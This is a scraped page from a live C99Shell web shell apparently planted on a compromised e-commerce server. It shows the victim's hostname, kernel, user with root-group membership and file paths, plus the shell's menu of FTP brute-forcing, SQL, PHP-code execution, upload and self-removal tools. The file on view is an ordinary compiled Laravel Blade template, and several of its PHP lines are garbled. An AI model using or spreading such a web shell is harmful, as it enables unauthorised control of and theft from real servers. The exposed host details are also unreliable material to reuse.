!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/storage/framework/views/   drwxr-xr-x
Free 27.18 GB of 117.98 GB (23.04%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     c0a2d8174a07a4c57ef1255b0758680c61dffc1b.php (5.15 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<li class="ui-state-default selector-template" data-id="tempid">
    <div class="component-header">
        <i class="feather feather icon-move"></i>
        <div class="header-text">
            <h5 class="header-title">
                <?php echo e(__('Select block')); ?>

            </h5>
        </div>
        <div class="header-btns">
            <span class="header-btn delete-button" data-bs-toggle="modal" data-bs-target="#confirmDelete"
                data-component="<?php echo e(__('New section')); ?>" data-component-id="0">
                <i class="feather icon-trash-2"></i>
            </span>
            <span class="header-btn folding btn-primary">
                <i class="feather icon-chevron-up"></i>
            </span>
        </div>
    </div>
    <div class="card dd-content">
        <div class="card-body">
            <form action="<?php echo e(route('builder.form', ['file' => '__file'])); ?>" method="post" id="layout_selector"
                class="form-horizontal silent-form">
                <?php echo csrf_field(); ?>
                <div class="form-group row">
                    <label class="col-sm-3 control-label" for="category" data-toggle="tooltip" data-placement="top"
                        title="<?php echo e(__('Type of the section you want to add.')); ?>"><?php echo e(__('Section Type')); ?></label>
                    <div class="col-sm-8">
                        <select class="form-control select3" name="type" id="l_category"
                            data-placeholder="<?php echo e(__('Select block type')); ?>">
                            <?php $__currentLoopData $layouts$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $layout): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                                <option value="<?php echo e(slugMe($layout->name) . '-' $layout->id); ?>"><?php echo e($layout->name); ?>

                                </option>
                            <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                        </select>
                        <input id="l_layout" type="hidden" name="file">
                    </div>
                </div>
                <div class="form-group row">
                    <label class="col-sm-3 control-label" for="category" data-toggle="tooltip" data-placement="top"
                        title="<?php echo e(__('Design of the section.')); ?>"><?php echo e(__('Section BLock')); ?></label>
                    <div class="col-sm-8">
                        <?php $__currentLoopData $layouts$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $type): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                            <div class="row layoutBlocks <?php echo e($key != 'd-none' ''); ?>" id="<?php echo e(slugMe($type->name) . '-' $type->id); ?>"
                                >
                                <?php $__currentLoopData $type->layouts$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $item): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                                    <div class="col-6 col-md-4">
                                        <div class="card mb-3 selectable selectedBlock" data-val="<?php echo e($item->file); ?>">
                                            <img class="card-img-top" src="<?php echo e(getBlockThumbnail($item->image)); ?>"
                                                alt="Card image cap">
                                            <div class="card-body">
                                                <h5 class="card-title"><?php echo e($item->name); ?></h5>
                                            </div>
                                        </div>
                                    </div>
                                <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                            </div>
                        <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                    </div>
                </div>

                <div class="form-group d-flex">
                    <button class="btn btn-primary custom-btn-small <?php echo e(languageDirection() == 'ltr' 'float-right' 'float-left'); ?>"
                        data-url="<?php echo e(route('builder.form', ['file' => 'layout_1'])); ?>" data-layout="0" type="submit"
                        id="layout_select"><?php echo e(__('Select')); ?>

                        <div class="spinner-border border1px loading-spinner spinner1rem d-none" role="status">
                            <span class="sr-only"><?php echo e(__("Loading")); ?>...</span>
                        </div>
                    </button>
                    <label for="btn_save" class="col-sm-0 <?php echo e(languageDirection() == 'ltr' 'ms-3' 'me-3'); ?> control-label message"></label>
                </div>
            </form>
        </div>
    </div>
</li>
<?php /**PATH /home/picotech/domains/ecom1.picotech.app/public_html/Modules/CMS/Resources/views/edit/selector.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0049 ]--